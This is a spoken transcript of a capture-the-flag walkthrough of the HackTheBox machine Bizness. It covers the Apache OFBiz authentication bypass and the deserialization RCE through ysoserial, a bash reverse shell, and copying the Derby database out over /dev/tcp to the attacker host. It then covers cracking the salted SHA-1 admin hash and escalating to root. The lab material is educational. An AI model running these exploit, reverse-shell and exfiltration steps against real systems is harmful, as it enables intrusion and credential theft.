What's going on YouTube? This is IPSEC. I'm doing Bizness from HackTheBox, which centers around a piece of software called Apache OfBiz that had two big CVEs against it recently. The first is a authentication bypass, and the second one is a remote code execution that involved Java deserialization. There is a Python script on GitHub that easily exploits this. As long as you have a working copy of YSOSERIAL, you could just download the release off of GitHub, but it's a little bit out of date now, so I'm going to use Docker to build the latest copy of YSOSERIAL. It's not needed, but always good practice to know how to do it. Once you get a shell on the box, the next step is dumping all the user passwords out of this, which is a little bit tough because it's using a obscure database called Derby. You have to export the database, get it running locally, and then figure out the hashing format yourself because the hashes are stored in a format that hashcat won't crack right away. It's not that hard to figure it out, so we're just going to jump in and do this box. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This is going to show us the TTL and things like that. OA output all formats, put in the nmap directory and call it business. Then the IP address of 10.10.11.252. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. The first one being SSH on port 22. Its banner tells us it's a Debian server. The -vv, this is why we're seeing the TTL here. Everything's set to 63, so it's not interesting. The second port is HTTP on port 80. Its banner tells us it's running NGINX, and it's redirecting us over to business.htb. So let's go take a look at this, or add this to our host file, I should say. So sudo v etc host, and we can add 10.10.11.252 business HTTP. And then the final port is 443. That is NGINX. And looking at this, let's see, HTTP headers, SSL cert. Don't see anything too interesting here, so let's just go take a look at the website. So HTTPS business.htb. Let's accept this SSL certificate. And we get the page business incorporated. So let's just go take a look. It looks like it's a single page thing. Looking at the site icon, this is Bootstrap. So probably a static website. Looking here, we have a contact form. I'm going to just put in junk here to see if we can send any data. When I click send message, nothing's happening. So this contact form is just non-functional. At the very footer of this, we see it is powered by Apache OfBiz. So that's probably going to be like what is running it. Normally Apache things, they are ran, like Apache OfBiz. When I see like an Apache product, I always think of Java. When it's just Apache HTTPD, of course, that's not Java, but like Apache Tomcat, like a bunch of Apache and then something else afterwards is a lot of time Java. So I'm going to take a look at the cookies of this page. So Burp Suite is set to intercept. We can go here. Let's go send this. Look at all the headers, and we can see I do have a JSession ID cookie. If I got rid of that, we can see the page is explicitly setting this. And whenever I see this, I always try checking out like manager/HTML. And if I see I think it's like a 401 forbidden or something, then I normally poke at it a lot more. Right here, it's just doing the normal like redirect it was doing earlier. But that exploit would be like ... semicolon to see if it can bypass the NGINX ACL. I think it's like the Tomcat off by 1. If you want to see like an example of that, just go to like ipsec.rocks. I'm going to turn Burp Suite off when I go here. And then you just search like Tomcat NGINX. And we talked about it in the seal video. So if you want to see more about that, go there. But business is not vulnerable to it. So we got to think about what else we can do here. I'm going to do a gobuster. So let's do gobuster directory mode -u http. Oh, it's https business.htb. And then -k is going to allow it to follow the accept the invalid SSL cert. And then the word list, op, sec list, discovery, raft, web content, raft, small words, .text. And let's see, everything is redirecting to 302. If we went to like, well, ASD, we get a 302 redirect. If we do a different one, again, every invalid page is doing that. And this is why gobuster is saying, hey, we can't identify what an invalid request is. Because when it makes this request to this random UUID, it's expecting to get a 404. We could do -R to follow redirects. We see follow redirect is now set to true, but again, this is not really helping us. It's saying, hey, everything is length 27200 now, so we can't identify what an invalid page is. So I'm going to switch over to FFUF because FFUF is easier to filter on invalid things. So we'll do FFUF-U for URL, HTTPS, business.htb, then do fuzz/-k again to accept the invalid SSL cert, -W, we can probably just do that. There we go. And if we hit enter, follow redirects is set to false by default. And we see everything is a size 0302. So now I'm going to do a -R again to follow the redirect. And we see everything has a size of 27200. So I'm going to do a -FS to filter size 27200. And we're starting to get pages. We have like catalog, content, control, AR, eBay, marketing. So let's go try one of these. If I do like /eBay, we have it redirecting us to eBay control main. If we do like, catalog was another one. Redirecting us to catalog control main. So let's go in a web browser and try going to /eBay. And then we can turn Burp Suite off because we don't need it right now. I don't know why the icon's not changing. Oh, there we go. Redirecting us to eBay control main. It is a login prompt. And we have OfBiz. So I'm going to Google like OfBiz default credentials and see if we can find any real quick. Tenable. Let's check out this page. My Firefox looks like it's hung. That's not good. Oh, username, admin, password of OfBiz is the default. So I'm going to restart, or Firefox is going to restart for me. And we're going to try admin OfBiz. So let's do /catalog. It should redirect us over to the login. And then try admin OfBiz. Don't save. And password incorrect. If we look at the photo, we do see it is powered by Apache OfBiz release 1812. So we could Google for exploits here. So if we just Google this, go Google, we do get an exploit script. And we're going to actually not use the Python script. We're going to step through it because I think you learn a lot more that way. It's going to be 2 exploits. I forget which one is which. One is just a authentication bypass. The other one is RCE. If we look at this, CVE 2023-49070, this is a pre-authentication RCE. It is due to XML RPC, is no longer maintained and still present. So that is the RCE vulnerability. This one is going to be the authentication bypass. So I'm going to Google this CVE real quick. And let's see exactly what this is. So let's see. I'm going to add blog to the search. And then we go to Sonic Wall. Let's see. Disclose. I would recommend reading this whole blog post. We're going to go over just what is interesting. It's talking about this in lines 437 to 448 from the login function. It returns the value of require password change due to the username and password being empty and require password change setting to Y. So if we look at this, actually, before we go over the code, let's just look at the exploit real quick so we can see the result of it, and then we'll look at the code because I think that'll make it easier for you to understand. So in this exploit script, it does have a check function. It's going to hit the target URL /ping test. This is going to be the parameters. And if Pong is in the response text, it's going to respond, the target is vulnerable. So let's look at what ping test is. Ping test is going to go to web tools, control ping, and then it's going to enter the parameters username equals Y, password equals Y, require password change equals Y. So let's just send this request. So So if I send a GET request to that, we have the response Pong. If we set this to no, it gives us the page, right? So if require password change is set to Y, then badness happens. I wonder if we need that semicolon. We don't even need that semicolon there. Maybe that's like, I don't know why they have that, but you don't need it. You don't need that slash probably either. So this is weird behavior. So let's now look at the code. So it highlights this function. We are in login here, right? It's getting all the parameters. We go down here. We're checking if username's empty. Nope, it's not. Password's not empty. Okay. Now it's saying, hey, if the required password change is set to Y, then that's going to be true. And if it's true, we're going to return the value of it, which is true. So when we have this value here, the login function is going to say, yep, they passed login. If that variable wasn't set, it keeps going down. I think this is like getting the tenant, go down here, and then we're going to start doing the user login, right? So the whole bug here is essentially right here. It's checking, hey, do they require a password change? Yes, they do. Let's now return true. And since it returns true, when we're hitting this endpoint, it says, hey, we want to do a login to validate they can hit ping. And it goes down here, goes, hey, yes, they can log in because they need to change their password. Weird bug, but that's the authentication bypass. And then the second piece of the exploit is just going to be a standard deserialization in Java. So it goes into the XML RPC interface, and we send this XML and give it a serialized payload, and when it unserializes it, it gets code execution. So I'm not running this Python script because I always hate running YSOSERIAL just on my main machine because I always seem to run into like Java issues. Instead of setting my Java environment correctly, I like just running it in Docker, right? And all this Python script is going to do, let's see, if we go here, where is it? It like runs the YSOSERIAL jar file. And since I'm running it in Docker, it's not so easy to do, right? So let's do it all manually. So first we have to go download YSOSERIAL. Let's see, let's go grab this. I'm going to do a git clone on this. And then I like just running the Docker. They have a Docker file. So we'll do docker build dot, and we'll give it the tag YSOSERIAL. So it's easy to run. And this is going to take a little while to run. And if you watch a lot of my videos, you know I don't really like using this version of YSOSERIAL. I like using YSOSERIAL modified, but that's got so out of date now. And that's the same, like being out of date is why I don't just download the release here. Because if we do, you can notice that's built like 2 years ago, but the last commit is 2 months ago. So you get a wildly out of date version if you just go off the jar. Now, there is a separate YSOSERIAL project called YSOSERIAL-modified. And oh my God, what is going on with my Firefox? There we go. And the whole reason for this is it changes how like the exec functionality runs. If you want to, I think in my registry 2 video, we use this one and go over it. But you can see this last commit is 6 years ago. So you'll also get a super out of date version if you use it. But when we run YSOSERIAL, you're going to notice we have to do a lot of weird things. If we go here, it's talking about it. Essentially, all the fancy redirectors don't work. So we can't just get a standard reverse shell. In order to get a reverse shell, we have to like not use spaces because space is a bad character in the main version of YSOSERIAL. And that's why I normally don't bother using it. However, let's try this. So we can see how this script does it. We do the bash reverse shell, then we base64 encode it, and then we do this bash-c thing. So I'm just going to grab this real quick. Let's do gen shell.py, paste this in. And then we have to import base64. And then I'm going to do print generate rev shell 10.10.14.8. then 9001. So when I run this, we get this as a reverse shell. And this is what we need for pasting it into YSOSERIAL. It is obnoxious. Looks like we are almost done building. And hit enter. Nope, still waiting on it. Oh, running Maven verify. So while we wait for that, let us now, I guess, start getting our payload working. Where is the exploit? Right here. So since we want to do RCE, we have to now hit the XML RPC interface. So let's see, this will be called auth bypass. We'll do RCE. So we'll paste this. So now we're hitting XML RPC. We're going to change this to a post. And we probably need to do this again. There we go. And the content type is probably not xww URL encoded. It is application XML. So let's change that. And now let's send it the XML it wants. So we can grab all of this. And then paste this in. There we go. So now we just have to get our payload. And we are still waiting on the Docker to build. So I'm going to pause the video and we'll come back when this is done building. I was hoping to get this all done without any cuts, but doesn't look like I can. Okay, now it is built. We can do a Docker run YSOSERIAL, and then we get the output. So it wanted us to run, what was it, like common collections bean 1? Let's do YSOSERIAL. Yes, we do common collections bean 1, and then the arguments. So we can do that. And then I'm going to say, first, let's do a ping. Whenever doing YSOSERIAL stuff, you saw like how wonky that reverse shell is. I like validating with a ping first because that generally just works. So we can do ping -c1 for just a 1 count. Then 10, 10, 14, 8. Do I put this in? There we go. We have to Base64 encode this. And I'm going to do xclip selection primary to put it on my clipboard. Maybe it's selection clipboard. There we go. So we have that pasted. I can just do a sudo tcp dump -n so we don't do DNS -i ton 0. And we also have to specify ICMP. I'll clear my screen before we do this. And when I run this, hopefully I get 1 ping. I do. We can see 10.10.252 reached out to me and I sent a response back. So now we know we have a valid payload. So what we want to do is put the second one in. So let's copy this command. Put it over here. Run this. Then nc lvnp 9001. I'm going to change out the Base64. That's a big payload. Put that in. Go here. And voila, we have the reverse shell. So let's do Python 3-c import pty spawn bin bash stty raw -echo fg enter. And now we can do things, or we have to export term is equal to xterm. Is it like xterm 256 color gets us color? Yes, it does. Okay. So now we're on OfBiz. The thing I normally like doing whenever I land on some type of web server is exporting the credentials. And if we go to like config, let's go config. Is it? Maybe it's not config. Let's see. Because I don't think it would be like check style, right? We can cat it. I don't think. Yeah, that's not it. Let's see. Where would the database be? lib plugins runtime. Is it runtime config or something? Applications. Not exactly sure. Let's see. If we cat the Docker file of this, does this really tell us OfBiz config runtime? Let's see. Connect to OfBiz database. Does this help us? Main entity engine. Do we have this file? We do. So it's under framework, entity, config, any engine. Did they say like database? Maybe data source is how it is. Grep data source. That is not helping us. I don't think this is like how it's running. This is just like all the options to run. Let's just try changing up our Google. I'm going to Google OfBiz default database to even see what the default database is, because if we looked at like SSLNTP, grep 33, we don't see like MySQL. I forget Postgres's port. But Google says by default, it uses a embedded Java database called Derby. So if I do a find .-name Derby, we can find the Derby database is in runtime data Derby. And we want to export this. If we Google around for Derby documentation, you enter it with the IJ. That's not on this box. We could also do a find --name IJ. Let's hide errors because it's going to go in directories we don't want the permissions to see if IJ was on the box, just not in our path. We can't access it. So I'm going to do a tar cvf derby.tar. Let's put this in dev.shm. Dev.shm derby.tar. Derby. There we go. And I'm going to copy this over to my box. So let's do nclvnp 9001. I'm going to call it derby.tar. We can say cat dev shm derby to dev tcp 10.10.14.8 9001. Man, that's ugly because I didn't like change my line wrapping, how it just wrapped to the beginning. But oh well, it is now copying. Let's see. Connect to Derby database. It's going to be like JDBC colon something. Connecting, let's see. Java, IJ. Okay, so we can set the protocol, then connect. Okay, let's do a tar xj or xvf. We didn't compress it. Derby. And if you don't have the Derby tools, you can do it with a sudo apt install derby-tools. I believe I already have these installed. So I'm just going to do IJ, and then we do protocol, JDBC, Derby, and then connect the database name. I'm going to do OfBiz. Connect /OfBiz. There we go. I think we're connected. Oh, we did do a semicolon. No. That did not work. Let's see. What was the syntax? Database connection examples, JDBC, Derby. What if I just did connect JDBC Derby OfBiz. Okay, I think we're connected there. If I do show tables, awesome. So we probably want to go to the user login table. So if I do a select star from user login, it does not exist. Select star from the database name is offbiz.userlogin. And it looks like we got a bunch of data. So let's do a describe first because we have too much data. We can't really make sense on our screen. So I do describe offbiz.userlogin. Let's see, what things do we want? Probably user login, password, and password hint. That sounds good. Select user login ID, current password, password hint from offbiz.userlogin. I was user underscore login. There we go. We have no password hints, we have admin, and we have a SHA hashed password. And we can either like go through the source code to figure out exactly how this is hashed, but this looks like a standard format. We just see the algorithm. Then you have a salt, so it's probably just a one-character salt, and then the hash. And this doesn't really match any type of SHA-SUM, right? Because if I do an echo-n wc-c, we just have 27 characters. However, this does look like it is base64 URL encoded. So what I'm going to try doing is decoding this. And I don't think the regular base64-d is going to work here. We could try. We have invalid input. Again, because this is URL encoded. What is it? Would it be like a slash and a plus, I want to say? And then we probably have padding issues. So it decoded that. Instead of like knowing how to manually convert base64 to base64 URL, there is another tool. There's base-enc. And base-enc is going to let us do that. Let's see. Let's go back there. So we can add the -d for decrypt. And I think it's base64 URL. Base-enc. Help. Let's see. -- base64 URL. And -d is decode. I may have said decrypt before, but it's decode. We have invalid input. Again, this is just padding. A lot of languages just like killing the padding of base64. I don't understand why, but we have it decoding the base64. If I pipe it over to xxd, let's do a -p so we get everything just on one line. Then we can do a wc-c and 41. This is going to be 40 characters in a line break. And if we echo this to SHA-1 let's do an awk print 1 wc-c, we get 41. So we know this is a SHA-1 sum. So if we go back here, it's the salt was D. So I'm going to go over to hashcat. Let's do sh, the Kraken, cd hashcat, v, or let's do hashcat.bin, example hashes, and we want to grep for SHA-1. Let's do grep name so we get rid of example hashes. And let's see, we probably want either this one or this one, either the password first, then the salt, or the salt, then the password, right? So let's go less, was it SHA-1? So either mode 110, and that's going to be the pass, then the salt, or 120. And the format is salt:#. And if we did 110, are those really the same thing? Just no. So or not salt colon hash. This is going to be the hash colon the salt is how we do it. So 110 or 120. Mode 110 or 120. That's the thing we don't know. So let's try them both. V hashes. I'm going to call it OfBiz. And let's see. Where was it? This is it. Okay. So we got that. And then the salt was D, or the salt could be also XML encoded, right? So let's do echo-n, or not XML, hex encoded. XXD 64. So this is probably going to be it, right? So let's do /hashcat -m 110. The word list file, which will be, or the hashes file, which will be hashes OfBiz, then the word list op word list rocku.txt. Let's run this and see if we get a hit. If we don't, then I'm going to try 120. And if we don't get a hit there, then that's when I would go into the source code and try to figure out what we did wrong. So it's going to run. It does not take long since it's just a standard SHA-1. We did not recover any of those. So let's do 120 and see what we have. And right away, we got one hit. If we go up, we see the salt was just D and the password is monkey business. So let's try monkey business for any password. Let's see. Here we go. Sudo -l, password of OfBiz. I put monkey business to see if it's that password. Let's grep the passwd file for all the shells. And there is root. So let's do su-, put in monkey business, and there we go. We got the root. If we cat root.txt, that is the box. So hope you guys enjoyed it. Take care, and I will see you all next time.